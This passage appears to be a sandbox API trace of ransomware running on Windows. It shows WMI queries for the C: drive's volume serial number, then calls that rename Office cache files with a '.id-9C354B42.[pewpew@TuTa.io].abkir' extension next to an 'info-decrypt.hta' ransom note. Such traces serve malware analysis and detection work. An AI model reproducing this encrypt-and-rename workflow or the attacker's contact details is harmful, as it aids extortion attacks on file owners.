ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0161.797] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60275c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x60307f0) returned 0x0 [0161.797] WbemDefPath:IUnknown:Release (This=0x60275c0) returned 0x0 [0161.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x60307f0) returned 0x0 [0161.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0161.797] WbemDefPath:IUnknown:AddRef (This=0x60307f0) returned 0x3 [0161.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0161.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0161.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbdefc0) returned 0x0 [0161.797] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdefc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.797] WbemDefPath:IUnknown:Release (This=0xbdefc0) returned 0x3 [0161.797] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0161.797] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0161.797] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0161.797] WbemDefPath:IUnknown:Release (This=0x60307f0) returned 0x2 [0161.797] WbemDefPath:IUnknown:Release (This=0x60307f0) returned 0x1 [0161.797] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0161.797] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0161.798] WbemDefPath:IUnknown:QueryInterface (in: This=0x60307f0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x60307f0) returned 0x0 [0161.798] WbemDefPath:IUnknown:AddRef (This=0x60307f0) returned 0x3 [0161.798] WbemDefPath:IUnknown:Release (This=0x60307f0) returned 0x2 [0161.798] WbemDefPath:IWbemPath:SetText (This=0x60307f0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0161.798] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60307f0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0161.798] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0161.798] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.798] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0161.798] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0161.798] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0161.798] IUnknown:Release (This=0xb51e34) returned 0x1 [0161.798] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x601f540) returned 0x0 [0161.799] WbemLocator:IUnknown:QueryInterface (in: This=0x601f540, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0161.799] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f540, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6027580) returned 0x0 [0161.799] WbemLocator:IUnknown:Release (This=0x601f540) returned 0x0 [0161.799] WbemLocator:IUnknown:QueryInterface (in: This=0x6027580, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6027580) returned 0x0 [0161.799] WbemLocator:IUnknown:QueryInterface (in: This=0x6027580, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0161.799] WbemLocator:IUnknown:AddRef (This=0x6027580) returned 0x3 [0161.799] WbemLocator:IUnknown:QueryInterface (in: This=0x6027580, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0161.799] WbemLocator:IUnknown:QueryInterface (in: This=0x6027580, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0161.799] WbemLocator:IUnknown:QueryInterface (in: This=0x6027580, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0161.799] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0161.799] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0161.799] WbemLocator:IUnknown:QueryInterface (in: This=0x6027580, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0161.799] WbemLocator:IUnknown:Release (This=0x6027580) returned 0x2 [0161.799] WbemLocator:IUnknown:Release (This=0x6027580) returned 0x1 [0161.799] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0161.799] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0161.800] WbemLocator:IUnknown:QueryInterface (in: This=0x6027580, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6027580) returned 0x0 [0161.800] WbemLocator:IUnknown:AddRef (This=0x6027580) returned 0x3 [0161.800] WbemLocator:IUnknown:Release (This=0x6027580) returned 0x2 [0161.800] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60307f0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0161.800] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0161.800] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.800] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6027590) returned 0x0 [0161.800] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027590, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x603310c) returned 0x0 [0163.485] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5bd64) returned 0x0 [0163.485] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bd64, pProxy=0x603310c, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0163.485] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x1 [0163.485] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5bd84) returned 0x0 [0163.485] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5bd64) returned 0x0 [0163.485] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bd64, pProxy=0x603310c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0163.486] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x2 [0163.486] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0163.486] CoTaskMemFree (pv=0xbd4a68) [0163.486] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x0 [0163.610] WbemLocator:IUnknown:QueryInterface (in: This=0x603310c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5bd84) returned 0x0 [0163.610] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0163.774] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0163.776] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0163.776] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0163.777] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0163.782] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5bce4) returned 0x0 [0163.782] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0163.782] WbemLocator:IUnknown:Release (This=0xb5bce4) returned 0x3 [0163.782] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0163.782] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0163.782] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5bd6c) returned 0x0 [0163.782] WbemLocator:IRpcOptions:Query (in: This=0xb5bd6c, pPrx=0xb5bd84, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0163.782] WbemLocator:IUnknown:Release (This=0xb5bd6c) returned 0x3 [0163.782] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0163.782] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0163.783] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0163.783] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x603310c) returned 0x0 [0163.783] WbemLocator:IUnknown:AddRef (This=0x603310c) returned 0x4 [0163.783] WbemLocator:IUnknown:Release (This=0x603310c) returned 0x3 [0163.783] WbemLocator:IUnknown:Release (This=0x603310c) returned 0x2 [0163.783] SysStringLen (param_1=0x0) returned 0x0 [0163.783] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030780, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0163.783] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0163.783] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0163.783] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0163.783] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0163.783] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5bd84) returned 0x0 [0163.783] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x3 [0163.783] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0163.783] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0163.783] WbemDefPath:IWbemPath:GetText (in: This=0x6030780, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0163.783] IWbemServices:GetObject (in: This=0x603310c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0164.225] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60307f0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0164.225] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0164.225] WbemDefPath:IWbemPath:GetText (in: This=0x60307f0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0164.225] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36dc040*=0, plFlavor=0x36dc044*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36dc040*=8, plFlavor=0x36dc044*=0) returned 0x0 [0164.225] SysStringByteLen (bstr="9C354B42") returned 0x10 [0164.225] SysStringByteLen (bstr="9C354B42") returned 0x10 [0164.225] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36dc040*=8, plFlavor=0x36dc044*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36dc040*=8, plFlavor=0x36dc044*=0) returned 0x0 [0164.225] SysStringByteLen (bstr="9C354B42") returned 0x10 [0164.225] SysStringByteLen (bstr="9C354B42") returned 0x10 [0164.226] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0164.226] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x73 [0164.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0164.226] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1d77b5e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0164.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0164.226] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0164.227] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0164.227] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0164.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0164.227] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b18b740, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1b18b740, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1b18b740, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0164.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0164.227] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0164.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0164.227] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), fInfoLevelId=0x0, lpFileInformation=0x36dc6e4 | out: lpFileInformation=0x36dc6e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, 